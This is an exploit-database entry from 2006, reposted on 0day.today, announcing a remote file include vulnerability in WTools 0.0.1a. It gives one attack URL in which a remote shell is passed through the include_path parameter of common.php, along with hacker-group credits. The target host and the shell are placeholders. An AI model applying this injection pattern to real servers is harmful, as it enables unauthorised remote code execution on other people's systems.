id: 815
date: 09/10/2006
title: WTools 0.0.1a (include_path) Remote File Include Vulnerability
author: ddoshomo
cves: 

==============================================================
WTools 0.0.1a (include_path) Remote File Include Vulnerability
==============================================================



#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  WTools v0.0.1-ALPH - Remote File Include Vulnerabilities
 
# Script  :  WTools v0.0.1-ALPH
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/common.php?include_path=[shell]




#  0day.today [2023-03-26]  #